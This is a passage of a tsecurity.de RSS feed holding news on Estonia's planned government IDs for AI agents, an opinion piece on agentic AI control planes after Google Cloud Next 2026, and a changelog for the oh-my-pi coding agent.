<p><a href="https://b2b-contenthub.com/article/3802476/biden-white-house-to-go-all-out-in-final-sweeping-cybersecurity-order.html?customize_changeset_uuid=adc99f06-51c3-446a-b677-4c60d50a4974&amp;customize_theme=cso-b2b-child-theme#:~:text=Daniel%20says%2C%20%E2%80%9CIf,countries%20like%20that.%E2%80%9D">Estonia is already a leader in the use of digital identities</a> for humans. Estonians can use their national digital ID cards for voting, signing documents, accessing medical and tax records. The country also offers foreigners the option of applying for “<a href="https://www.e-resident.gov.ee/">e-residency</a>,” a digital identity enabling them to create a company in Estonia and digitally sign all related documents online as they interact with the country’s widely digitized administrative processes.</p>



<p>Michal created the AI Council in January, calling on Estonian startups, investment funds, industry and research institutions to systematically implement AI across the country’s industry, education, healthcare, and energy sectors.</p>



<p>AI vendors have already proposed creating <a href="https://www.infoworld.com/article/4157183/aws-targets-ai-agent-sprawl-with-new-bedrock-agent-registry.html">digital identities for agents</a>, but so far these are intended only to <a href="https://www.computerworld.com/article/4092436/microsoft-unveils-agent-365-to-help-it-manage-ai-agent-sprawl.html">manage the activities of agents</a> within the enterprise, or for <a href="https://www.cio.com/article/4057700/workday-and-microsoft-collaborate-to-manage-agentic-ai-workers.html">interconnecting enterprise IT platforms</a>, and none of them have the backing of governments.</p>



<p>Estonia’s proposal could put the tiny Baltic country at the cutting edge of agentic AI usage and set an example for others.</p>



<p><em>This article first appeared on <a href="https://www.computerworld.com/article/4186310/estonia-plans-government-ids-giving-ai-agents-rights-and-responsibilities.html">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Estonia plans government IDs giving AI agents rights and responsibilities]]></title>
<description><![CDATA[There’s no shortage of agentic AI tools out there that offer to perform online tasks on your behalf, if only you’ll give them all your passwords and credit card details. The trouble starts when those agents don’t know when to stop — or when others don’t know to stop them.



In Estonia, the count...]]></description>
<link>https://tsecurity.de/de/3605125/it-nachrichten/estonia-plans-government-ids-giving-ai-agents-rights-and-responsibilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605125/it-nachrichten/estonia-plans-government-ids-giving-ai-agents-rights-and-responsibilities/</guid>
<pubDate>Wed, 17 Jun 2026 16:48:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>There’s no shortage of agentic AI tools out there that offer to perform online tasks on your behalf, if only you’ll give them all your passwords and credit card details. The trouble starts when those agents don’t know when to stop — or when others don’t know to stop them.</p>



<p>In Estonia, the country’s AI Council has plans to change that, proposing to issue government-backed digital identities for AI agents that spell out what powers a person or company is willing to delegate to them.</p>



<p>“In the future, AI will increasingly perform digital operations on behalf of a person, company, or institution,” said Estonian Prime Minister Kristen Michal in a news release. “To do this, it must be clear who is acting, on whose behalf, with what rights, and who is responsible.”</p>



<p>He supported the AI Council’s proposal to create a digital identity for AI agents that will define agents’ rights and enable them to act in a verifiable and auditable manner.</p>



<p>The ID could, the council suggests, show whether an agent is only allowed to view data, create or edit documents, or make payments, and if so, up to what limit.</p>



<h2 class="wp-block-heading">First mover advantage</h2>



<p>There’s no telling when the plan will come to fruition — although Michal is keen for his country to take the lead.</p>



<p>“If we act quickly and wisely, Estonia will become the first country in the world to create an official digital identity for AI agents,” he said.</p>



<p><a href="https://b2b-contenthub.com/article/3802476/biden-white-house-to-go-all-out-in-final-sweeping-cybersecurity-order.html?customize_changeset_uuid=adc99f06-51c3-446a-b677-4c60d50a4974&amp;customize_theme=cso-b2b-child-theme#:~:text=Daniel%20says%2C%20%E2%80%9CIf,countries%20like%20that.%E2%80%9D">Estonia is already a leader in the use of digital identities</a> for humans. Estonians can use their national digital ID cards for voting, signing documents, accessing medical and tax records. The country also offers foreigners the option of applying for “<a href="https://www.e-resident.gov.ee/">e-residency</a>,” a digital identity enabling them to create a company in Estonia and digitally sign all related documents online as they interact with the country’s widely digitized administrative processes.</p>



<p>Michal created the AI Council in January, calling on Estonian startups, investment funds, industry and research institutions to systematically implement AI across the country’s industry, education, healthcare, and energy sectors.</p>



<p>AI vendors have already proposed creating <a href="https://www.infoworld.com/article/4157183/aws-targets-ai-agent-sprawl-with-new-bedrock-agent-registry.html">digital identities for agents</a>, but so far these are intended only to <a href="https://www.computerworld.com/article/4092436/microsoft-unveils-agent-365-to-help-it-manage-ai-agent-sprawl.html">manage the activities of agents</a> within the enterprise, or for <a href="https://www.cio.com/article/4057700/workday-and-microsoft-collaborate-to-manage-agentic-ai-workers.html">interconnecting enterprise IT platforms</a>, and none of them have the backing of governments.</p>



<p>Estonia’s proposal could put the tiny Baltic country at the cutting edge of agentic AI usage and set an example for others.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Who owns the control plane? Google Cloud Next 2026 and the real contest in agentic AI]]></title>
<description><![CDATA[I recently spent some time reflecting on the announcements from Google Cloud Next 2026, as well as a series of vendor briefings and a handful of enterprise architecture engagements, where the same question kept coming up across different venues: once an organization has agents, who governs them? ...]]></description>
<link>https://tsecurity.de/de/3604149/it-security-nachrichten/who-owns-the-control-plane-google-cloud-next-2026-and-the-real-contest-in-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604149/it-security-nachrichten/who-owns-the-control-plane-google-cloud-next-2026-and-the-real-contest-in-agentic-ai/</guid>
<pubDate>Wed, 17 Jun 2026 11:09:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I recently spent some time reflecting on the announcements from Google Cloud Next 2026, as well as a series of vendor briefings and a handful of enterprise architecture engagements, where the same question kept coming up across different venues: once an organization has agents, who governs them? For two years, the enterprise AI conversation has been a conversation about models — whose is largest, whose is cheapest, whose context window stretches furthest.  Virtually no one was talking about data and semantic context.</p>



<p>After getting some perspective, I was forced to consider that model obsession might have finally fizzled out under the grim reality of non-existent ontologies and limited to no semantic context for enterprise data. The interesting question is no longer which model an enterprise runs. It is who controls the connective context layer — the agentic control plane — that decides what those agents know, what they are allowed to do and who is accountable when a thousand of them are running at once. Whoever owns that layer owns the next decade of enterprise AI and judging by the “marketecture” of every major vendor at Next 2026, the industry has reached the same conclusion.</p>



<p>The urgency here is clearly not a slide-ware exercise. Gartner has <a href="https://www.gartner.com/en/newsroom/press-releases/2025-08-26-gartner-predicts-40-percent-of-enterprise-apps-will-feature-task-specific-ai-agents-by-2026-up-from-less-than-5-percent-in-2025" rel="nofollow">reported</a> an exponential surge in enterprise inquiries about multi-agent systems and predicts that 40% of enterprise applications will embed task-specific agents by the end of 2026, up from less than 5% a year earlier. Yet the same analysts deliver an equally important counterweight: Gartner also <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027" rel="nofollow">expects</a> more than 40% of agentic AI projects to be canceled by the end of 2027, citing escalating cost, an expanded risk surface and governance that no one built in advance. The <a href="https://www.gartner.com/en/articles/hype-cycle-for-agentic-ai" rel="nofollow">2026 Gartner Hype Cycle for Agentic AI</a> makes the diagnosis plain — governance, security and FinOps capabilities are proliferating precisely because enterprises are alarmed about accountability and control as agents grow more autonomous and interconnected. Exponential demand colliding with non-existent guardrails is the environment Google walked into. So, what is the path forward to a control plane an enterprise can actually trust?</p>



<h2 class="wp-block-heading">What Google actually brought to Next 2026</h2>



<p>I’m not ardent supporter of single-ecosystem architectures.  That’s not the world we live in and interoperability has always prevailed as the final arbiter of truth.  Beneath all the agent drama, however, Google’s message was fundamentally architectural. The company repositioned Gemini less as a standalone model and more as the connective and contextual tissue binding data systems, applications and agent runtimes, and assembled Big Query, Alloy DB, Spanner and its managed Spark service into a new category it calls the Agentic Data Cloud. As <a href="https://www.constellationr.com/insights/news/google-cloud-next-2026-look-big-themes" rel="nofollow">Constellation Research</a> observed, the standardization of data on Apache Iceberg has put the data layer itself in play, and Google responded by stacking its assets into a cross-cloud lakehouse and a knowledge catalog, complete with migration tooling pointed squarely at Snowflake and Databricks.</p>



<p>Three pillars define the offering. The first is a federated data layer built on the principle of reach, not relocation. By integrating Cross-Cloud Interconnect directly into the data plane and pairing it with the Apache Iceberg REST Catalog, Google lets agents query data residing on AWS or Azure as though it were local, with no egress fees and extends bi-directional federation in preview to Databricks’ Unity Catalog, Snowflake’s Polaris and the AWS Glue Data Catalog, <a href="https://cloud.google.com/blog/products/data-analytics/whats-new-in-the-agentic-data-cloud" rel="nofollow">according to Google’s own technical briefings</a> and <a href="https://venturebeat.com/data/the-modern-data-stack-was-built-for-humans-asking-questions-google-just-rebuilt-its-for-agents-taking-action" rel="nofollow">independent analysis</a>. Google data cloud managing director Yasmeen Ahmad summarized in Google’s <a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next26" rel="nofollow">Next ’26 announcement</a> with characteristic economy: you don’t move the data, you connect it.</p>



<p>The second pillar is a semantic layer — the Knowledge Catalog, an evolution of Dataplex — which uses Gemini to tag assets, infer relationships and map business meaning so that agents are grounded rather than, as one <a href="https://egen.ai/insights/three-biggest-ai-announcements-from-google-cloud-next-2026/" rel="nofollow">analysis</a> put it, fast but blind. Critically, its retrieval is permission-aware, meaning agents can only retrieve and act on assets they are explicitly authorized to see — a design choice that fuses context delivery and access control into a single operation. The third pillar is a build layer, the Data Agent Kit, which ships as portable skills, MCP tools and IDE extensions that drop into VS Code, Claude Code, Gemini CLI and Codex, deliberately declining to impose a new proprietary interface.</p>



<p>This is a credible and, to Google’s credit, a mostly real offering.  A control plane, however, is a claim, not a feature, and the term deserves more focus and detail than vendors typically provide.   An agentic control plane is not a product it is a semantically governed set of domain services and underlying structured and unstructured data.   How we federate agentic access and data with intention and governance means everything.</p>



<h2 class="wp-block-heading">What an interoperable control plane requires</h2>



<p>A control plane governs how a system behaves rather than performing the work itself. For agents, a genuine control plane must deliver at least five functions, and an interoperable one must deliver them across vendor, model and cloud boundaries rather than only within a single domain or scope.</p>



<p>The first is identity. Agents are a new class of non-human actors, and an enterprise must be able to authenticate them and manage their actions. Microsoft’s competing Agent 365, unveiled at Ignite 2025, is built explicitly around a registry of which agents exist, plus access control and security — as an Ignite 2025 <a href="https://news.microsoft.com/ignite-2025-book-of-news/" rel="nofollow">industry analysis</a> noted, that identity is foundational. The second is context and semantics, the half of the problem the data clouds have collectively rushed toward. The third, and the most consistently underplayed, is action governance — control not merely over what an agent can read, but over what it can do: the writes, the state changes, the transactional operations. The fourth is observability and lifecycle management, the simulate-evaluate-monitor-optimize loop across an agent fleet, where Google’s integrated offering is, by most accounts, the most complete a hyperscaler has yet shipped. The fifth is economics; the reason so many projects are forecast to fail is partly cost, and FinOps for agentic AI is now an expressly named discipline on Gartner’s Hype Cycle.</p>



<p>Interoperability cuts across all five, and here the industry has done something genuinely impactful and useful: it has agreed on protocols. The Model Context Protocol, originated by Anthropic and since donated to the Linux Foundation under multi-vendor governance, standardizes how an agent connects to tools and data. The Agent2Agent protocol, originated by Google and likewise moved to the Linux Foundation, governs how agents discover and delegate to one another across organizational boundaries. <a href="https://www.atchai.com/blog/model-context-protocol-enterprise-guide-2026" rel="nofollow">Forrester predicts</a> that 30% of enterprise app vendors will launch their own MCP servers in 2026, and <a href="https://www.gartner.com/en/newsroom/press-releases/2025-08-26-gartner-predicts-40-percent-of-enterprise-apps-will-feature-task-specific-ai-agents-by-2026-up-from-less-than-5-percent-in-2025" rel="nofollow">Gartner’s Anushree Verma</a> positions standardized protocols as the enabler of the seamless interoperability that, by 2028, will let networks of specialized agents collaborate dynamically across applications.</p>



<p>What is key here — and what enterprise leaders miss — is that open protocols deliver portable messages, not a portable control plane. Two agents can exchange tasks across clouds in A2A all day long, but identity, semantics, action governance, observability and cost remain platform functions.  A2A and MCP have ensured that the communication protocol has been commoditized.  The final frontier and the competitive moat is not the communication and access protocol, it is the semantic context and the business ontology</p>



<h2 class="wp-block-heading">Where Google is strong, and where leaders should look twice</h2>



<p>Google deserves real credit for embracing open standards where it counts. It adopted MCP across its own services, repositioned Apigee as an MCP bridge that turns any standard API into a governed agent tool and built its federation story on the open Iceberg REST Catalog rather than a proprietary format. <a href="https://tbri.com/special-reports/next-2026-lakehouse-and-agentic-paas-push-google-cloud-closer-to-the-center-of-ai-value-creation/" rel="nofollow">Technology Business Research</a> (TBR) characterized this as a meaningful strategic shift: a company historically defensive about keeping data inside BigQuery now signals that it cares less about where data physically resides than about ensuring Gemini is the semantic context layer generating value on top of it.</p>



<p>That repositioning is exactly the lock-in risk an enterprise must carefully consider, and two limitations matter significantly and deserve an architect’s attention. The first is that federation is not the same as unified control. In my view, TBR’s analysis is totally on point: The Knowledge Catalog addresses upper-stack governance but is not an operational catalog in the way that Databricks’ Unity Catalog, Snowflake’s Polaris and AWS Glue are — those systems govern the underlying Iceberg tables. Google reads into them; it does not replace them. The second is that the focus of lock-in has simply moved up the stack to the semantic context and ontology layers.  Moor Insights &amp; Strategy and others all have cautionary tales that exiting Google-managed semantics, Gemini agents or BigQuery abstractions may prove harder than migrating the data itself. The semantics and the orchestration are now the sticky layer. I think this is a logically coherent and impressive strategy, but for every gain, something is lost.  That loss is exactly the moment where an enterprise either preserves its independence or succumbs to lock-in for convenience and expedience.</p>



<p>There is a maturity gap also worth mentioning here as well. One widely-circulated <a href="https://blog.rittmananalytics.com/google-next-26-the-agent-stack-is-ready-the-semantic-engine-isn-t-44d1287e31f9" rel="nofollow">analysis</a> of Next 2026 carried its verdict in the title — the agent stack is ready, the semantic engine isn’t — arguing that the Knowledge Catalog, however promising, is not yet the governed business-context layer a true enterprise operating system demands and remains more aspirational than operational. With much of the federation and catalog functionality still in preview, optimism is the right approach from my perspective, not “all-in” commitment.</p>



<h2 class="wp-block-heading">Meanwhile, the competition is playing a different game</h2>



<p>The competitors are not building the same artifact, and the differences are instructive. The data-cloud catalogs — Databricks Unity Catalog, Snowflake Polaris and Cortex, AWS Glue, Microsoft Fabric — govern data and, increasingly, semantics; the entire field now accepts that agents need context, not merely access, as <a href="https://www.infoworld.com/article/4162737/google-pitches-agentic-data-cloud-to-help-enterprises-turn-data-into-context-for-ai-agents.html">industry analysis</a> of the field documents. Their structural limit is that catalog constraints are frequently informational rather than strictly enforced, and metric-oriented semantic layers model measures rather than actions or state changes. They excel at conversing with data and remain weaker at agents that act. The agent-management planes, exemplified by Microsoft’s Agent 365, approach the problem from fleet control — registry, identity, observability — and are excellent for organizations living inside Microsoft 365, bounded by that same dependence.</p>



<p>Palantir Foundry represents a genuinely different category. Where catalogs register tables and semantic layers define metrics, Foundry is built around an ontology that models entities, their typed relationships and the actions that can be taken against them — semantics in service of operational execution, not merely analytics.  That distinction is the single most important idea for anyone designing an agentic control plane today. As <a href="https://atlan.com/know/ontology-vs-semantic-layer/" rel="nofollow">Atlan</a> frames it, a semantic layer hands agents governed metrics, which solves half the problem; agents that reason across domains and act need a knowledge-representation layer underneath — what things are, how they relate and what operations are possible. A control plane that governs reads but not writes, metrics but not actions, is fundamentally limiting for agents, and semi-autonomous action is the entire point.    It is also worth noting, the semantic layer itself is now standardizing: the Open Semantic Interchange initiative, launched in late 2025 by Snowflake, dbt Labs, Salesforce and a coalition of partners under an Apache 2.0 license, finalized its v1.0 specification in early 2026. Just as MCP and A2A commoditized the agent communication protocols, OSI aims to commoditize semantic portability.</p>



<h2 class="wp-block-heading">A blueprint for enterprise leaders</h2>



<p>As always, the path forward is clear enough to state but extremely demanding to execute. An interoperable agentic control plane is not a product an enterprise purchases from a single vendor; it is an architecture it composes — open standards at the commoditized layers, owned assets at the differentiating one. Drawing on both the Next 2026 announcements and recent architectural engagements, I would urge leaders to prioritize four design commitments.</p>



<p><strong>First, standardize on open formats at the storage layer. </strong>Apache Iceberg and its REST Catalog deliver genuine data portability, and this is the one element of Google’s model worth adopting wholesale, precisely because the broader industry already has. Second, standardize on open protocols at the agent layer— A2A between agents and MCP to tools and systems — so that a Gemini agent, a Claude agent and a partner’s agent can interoperate without any one of them owning the others. Third, own the semantic and ontology layer in the middle. Don’t just model metrics but entities, relationships and the typed actions agents may perform; this is what delivers semantic portability and keeps the vendor lock-in at bay and in the enterprise’s own hands rather than a vendor.   Fourth, own the control-plane core components — identity, registry, observability and policy — so that governance remains independent of any single platform.</p>



<p>Any vendor relationship that requires managed semantics will make it intentionally harder to migrate data.   The architectural response should never be to place those semantics in any single vendor’s control in the first place. Federation buys data portability; an owned ontology buys semantic portability; open protocols buy agent portability. Composed together, they close the gap that the analysts identified.</p>



<p>The vendors will continue to make the case that the control plane is a product. The analysts — Gartner on governance and failure rates, Forrester on protocol proliferation, TBR and Moor on the limits of federation — are collectively telling enterprise leaders something more useful: it is an architectural decision, and the organizations that treat it as one, that build adaptive governance before their agentic minions outpace them and that preserve the option to change their minds, will be the ones still in command of their AI a decade from now.</p>



<p>Google Cloud Next 2026 is a genuinely strong architecture, and there is no doubt that it is the most complete agentic control-plane offering any hyperscaler has yet shipped. It is also the clearest illustration to date of why no enterprise should outsource its control plane to anyone. The shift from owning models to owning the control plane is not just underway; for organizations serious about operating at the speed of an agent-driven business, it is inevitable. The winning move at this point is to show up with an architecture, not a purchase order.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time, as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the</em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em> IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em> </p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.0.3]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Exported renderDelimitedThinking from the @oh-my-pi/pi-ai/dialect barrel so consumers can reuse the dialect's  envelope unwrap-and-rewrap logic (the only ./dialect/rendering primitive re-exported; the rest stay dialect-internal).

Fixed

Fixed OpenAI Responses/Codex tool sc...]]></description>
<link>https://tsecurity.de/de/3603377/tools/v1603/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603377/tools/v1603/</guid>
<pubDate>Wed, 17 Jun 2026 02:23:16 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Exported <code>renderDelimitedThinking</code> from the <code>@oh-my-pi/pi-ai/dialect</code> barrel so consumers can reuse the dialect's <code>&lt;thinking&gt;</code> envelope unwrap-and-rewrap logic (the only <code>./dialect/rendering</code> primitive re-exported; the rest stay dialect-internal).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenAI Responses/Codex tool schema normalization stripping provider-rejected regex lookaround patterns from MCP tool parameter schemas. (<a href="https://github.com/can1357/oh-my-pi/issues/2784" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2784/hovercard">#2784</a>)</li>
<li>Fixed OpenAI Responses parallel tool-call routing so late keyed argument deltas for a closed call are dropped instead of being appended to another open call.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for LaTeX color commands (<code>\textcolor</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>) in user-visible terminal prose and final chat to colorize output</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed STT dependency setup to validate recorder and model assets per <code>stt.modelName</code>, so switching speech models re-runs dependency checks and downloads for the new model</li>
<li>Changed STT startup with cached models to warm the speech model in the background and defer full model loading until transcription begins, reducing push-to-talk start latency</li>
<li>Allowed user-visible terminal and final-chat responses to include LaTeX math delimiters/commands and Mermaid <code>```mermaid</code> diagrams</li>
<li>Changed the hold-<code>Space</code> push-to-talk gesture to recognize a held bar from the <em>regularity</em> of the OS key auto-repeat rather than a raw space count or speed alone, so it no longer spams the editor, no longer eats deliberate space taps, and no longer triggers when the bar is smashed. Recording starts only after two consecutive inter-space deltas are "mechanical" — both fast (within ~120 ms) and near-identical, the metronomic signature of auto-repeat; the few pre-burst spaces typed are then tracked back out. Smashing (fast but jittery) and deliberate spacing (steady but slow) both keep typing real spaces and never start recording.</li>
<li>Updated markdown Mermaid rendering to color ASCII diagrams with the active theme and automatically choose a narrower layout that better fits the terminal width</li>
<li>Made the watched-session transcript sent to the advisor (and shown by <code>/advisor dump</code>) clearer: each turn now opens with a <code>### Session update</code> heading; watched-agent roles render as inline <code>**agent**:</code> / <code>**user**:</code> labels instead of level-2 headings that collided with the advisor's own turns; consecutive same-role messages collapse under one label (the watched agent emits one assistant message per tool call); and batched updates are joined by a blank line rather than a <code>---</code> rule.</li>
<li>Changed the compact transcript tool-intent prefix (<code>history://</code>, <code>/advisor dump</code>) from <code># </code> to <code>// </code> so intent lines read as comments instead of rendering as Markdown H1 headings.</li>
<li>Changed the advisor advice injected into the primary transcript from a <code>Advisor (...): - [severity] note</code> prose block to one <code>&lt;advisory severity="…" guidance="weigh, don't blindly obey"&gt;…&lt;/advisory&gt;</code> element per note, with XML-escaped bodies. (Relocated the shared <code>escapeXmlText</code> helper to <code>@oh-my-pi/pi-utils</code>.)</li>
<li>Reverted <code>/dump</code> and <code>/advisor dump raw</code> to the pre-16.x full verbose dump: system prompt, model/thinking config, tool inventory with parameters, and the message transcript rendered with markdown role headings (<code>## User</code>, <code>## Assistant</code>, <code>### Tool Call: &lt;name&gt;</code> with the call's <code>_i</code> intent as a <code>//</code> comment under the heading and the remaining arguments as a fenced YAML block, <code>### Tool Result: &lt;name&gt;</code>, plus <code>## Bash Execution</code>/<code>## File Mention</code>/summary sections) instead of the model's native-dialect turn envelopes and <code>&lt;invoke&gt;</code>/<code>&lt;parameter&gt;</code> XML tool calls. Dropped the compact default and the <code>[raw]</code> flag on <code>/dump</code>; the compact <code>→ tool(...) ⇒ ok</code> history format is no longer reachable from <code>/dump</code>. <code>/advisor dump</code> still defaults to compact, and <code>/advisor dump raw</code> now renders the same markdown dump (previously the model's native-dialect envelopes).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Whisper STT cache detection to require both encoder and decoder <code>.onnx</code> files, so partial model downloads now trigger a proper foreground download instead of being treated as fully cached</li>
<li>Fixed same-process <code>JsRuntime</code> cleanup so disposing an older inline/direct runtime no longer deletes a newer runtime's JS helper globals; inactive cmux/direct runtimes now re-activate their globals before sequential use while overlapping cross-runtime runs fail explicitly.</li>
<li>Fixed magic-keyword steering notices (<code>ultrathink-notice</code>, <code>orchestrate-notice</code>, <code>workflow-notice</code>) to be prepended before the related user message so they influence that same turn</li>
<li>Fixed dequeuing or popping queued user messages to remove their preceding hidden magic-keyword notice companions, preventing orphaned queued notices</li>
<li>Fixed queued user steers to auto-resume after interrupts even when the transcript tail is a preserved advisor card or other non-conversational custom message</li>
<li>Fixed queued user follow-up messages to remain queued after an interrupt and only run on explicit resume, even when an IRC wake leaves a provider-valid tail</li>
<li>Fixed stranded IRC asides to wake a response turn after interruption instead of remaining pending</li>
<li>Fixed accepted IRC asides to be flushed into the transcript during disposal instead of being discarded</li>
<li>Fixed interactive submissions made while the TUI had no active input waiter: they now start a real prompt directly, with steer fallback if a background turn races in, instead of queueing behind a non-resumable idle transcript and appearing to do nothing.</li>
<li>Fixed pressing Esc (or Alt+Up dequeue) while agent-authored messages were queued — advisor concern/blocker notes, hidden goal/plan/budget steers, IRC/extension asides — dumping their text into the user's editor. Editor restoration (<code>clearQueue()</code>), pending chips (<code>getQueuedMessages()</code>), and <code>popLastQueuedMessage()</code> now surface only genuinely user-authored queued messages (plain user turns and <code>attribution: "user"</code> custom messages like <code>/skill</code>). Plain Alt+Up dequeue leaves all other queued messages in place for the continuing stream; only the Esc interrupt path keeps just advisor cards (so abort's preservation still re-records them as visible advice) and drops other internal steers, so a user interrupt can't be silently undone by an auto-resume on leftover internal context. <code>queuedMessageCount</code> still reflects all actual queued work (advisor cards included) so <code>hasPendingMessages()</code>/RPC and the empty-submit abort gate stay accurate.</li>
<li>Fixed advisor <code>concern</code>/<code>blocker</code> advice being withheld from the running agent and then dumped as one burst at the next user prompt after a deliberate interrupt. A user interrupt latches advisor auto-resume suppression, but a non-user resume (synthetic/auto-continue, or a queued steer draining after the abort) leaves the run streaming with that latch still set, so every interrupting note was parked hidden in the next-turn queue instead of steered into the live turn — the agent never heard the advisor mid-run and the backlog flushed all at once on the next prompt. Suppression now only withholds interrupting advice while the agent is idle (or still tearing the interrupted turn down); once a turn is streaming again the note is steered in live, since steering an active run never auto-resumes a stopped one. A concern that strands in the steer queue past the resumed turn's final poll is reclaimed as visible advice when the agent settles (mirroring abort), so it neither auto-resumes the stopped run nor lingers to flush at the next prompt.</li>
<li>Fixed <code>omp --continue</code>/<code>-c</code> sometimes resuming into a subagent transcript instead of the interactive session. Subagent (and HTML-export) <code>SessionManager.open()</code> calls run in the parent's terminal and were clobbering the per-TTY <code>--continue</code> breadcrumb with their own artifact-dir session file; these headless opens now suppress the breadcrumb. <code>continueRecent()</code> also recovers already-poisoned breadcrumbs by resolving any session file inside a parent's artifacts dir (<code>&lt;parent&gt;/&lt;agentId&gt;.jsonl</code>) back up to the top-level session.</li>
<li>Fixed the Agent Hub stacking duplicate <code>Agent Hub · N running</code> frames and stranding garbage rows in scrollback while navigating with subagents still streaming. The hub was a non-fullscreen overlay composited over a live transcript, so each time a running subagent's progress grew the frame and scrolled the window the previously-painted hub copy was pushed permanently into the terminal's native scrollback (which the engine can't rewrite). It now renders inline in the editor slot — the same anchored region every other selector and the <code>ask</code> tool use — riding the normal append-only commit path, so the transcript commits above it exactly once and the hub repaints in place instead of leaking copies. (Avoids borrowing the alternate screen.)</li>
<li>Fixed every subagent registering itself as its own parent in the agent registry (<code>parentId === id</code>), so the Agent Hub rendered each agent as <code>sub · of &lt;itself&gt;</code> and the ←← parent-navigation gesture looped on the same agent. The SDK was reusing <code>parentTaskPrefix</code> — the agent's own artifact/output-id prefix — as the registry parent link; spawns now pass a separate <code>parentAgentId</code> (the spawning agent's id: <code>Main</code> for top-level <code>task</code> spawns, the parent subagent for nested spawns and eval <code>agent()</code>, the focused agent for <code>/tan</code>) and the registry records that as the parent.</li>
<li>Fixed messaging a <code>parked</code> subagent that was restored from disk (Agent Hub scan, or a resumed/restarted session) failing with <code>cannot be revived (no reviver registered)</code> even though its transcript was intact. Such refs carry a session file but no in-memory reviver — the executor's live reviver closure dies with the spawning turn/process — so IRC sends and Agent Hub focus refused them. <code>AgentLifecycleManager.ensureLive</code> now cold-revives them through a persisted-subagent reviver factory (installed by the top-level interactive/RPC session) that rebuilds the subagent from its JSONL the way <code>--resume</code> rebuilds a session: it reopens the file and replays it through <code>createAgentSession</code>, but sources the runtime contract from a now-readable <code>session_init</code> record (<code>SessionManager.peekSessionInit</code>) so tools, system prompt, output schema, and kind are restored rather than resurrected as a default top-level session. <code>session_init</code> now also persists the effective <code>spawns</code> allowlist and read-summarization flag so a cold revive keeps the original capability surface (old files without them deny re-spawning rather than defaulting to wildcard). Isolated runs and pre-<code>session_init</code> files whose recorded workspace no longer exists stay transcript-only (<code>history://</code>).</li>
<li>Fixed the terminal window-title OSC writes (<code>setTerminalTitle</code>/<code>pushTerminalTitle</code>/<code>popTerminalTitle</code>) leaking escape sequences to a developer's terminal during <code>bun test</code>; they now skip when the terminal is headless (the test-runtime default), matching the <code>ProcessTerminal</code> render/probe suppression so interactive-mode tests no longer paint to the real terminal</li>
<li>Fixed empty CLI sessions being retained after opening <code>omp</code> and exiting without a prompt (<a href="https://github.com/can1357/oh-my-pi/issues/2800" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2800/hovercard">#2800</a>).</li>
<li>Fixed <code>hooks/pre/*.ts</code> and <code>hooks/post/*.ts</code> files discovered through <code>hookCapability</code> being registered in discovery but never loaded into the extension runner, so their <code>tool_call</code> handlers now run without a manual <code>settings.json</code> <code>extensions</code> entry (<a href="https://github.com/can1357/oh-my-pi/issues/2796" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2796/hovercard">#2796</a>).</li>
<li>Fixed startup model fallback choosing the plain OpenAI <code>gpt-5.5</code> provider before the Codex OAuth provider when both shared the same default model id, which could surface a misleading OpenAI 401 despite valid Codex credentials (<a href="https://github.com/can1357/oh-my-pi/issues/2807" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2807/hovercard">#2807</a>).</li>
<li>Fixed local auto-thinking classification for reasoning-capable tiny models by giving them the same safe answer budget as online reasoning classifiers, with a larger local floor for non-reasoning tiny models (<a href="https://github.com/can1357/oh-my-pi/issues/2808" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2808/hovercard">#2808</a>).</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the built-in <code>render_mermaid</code> tool and its <code>renderMermaid.enabled</code> setting, so it can no longer be invoked directly</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Removed</h3>
<ul>
<li>Removed rendering support for the <code>render_mermaid</code> tool from the web tool registry</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
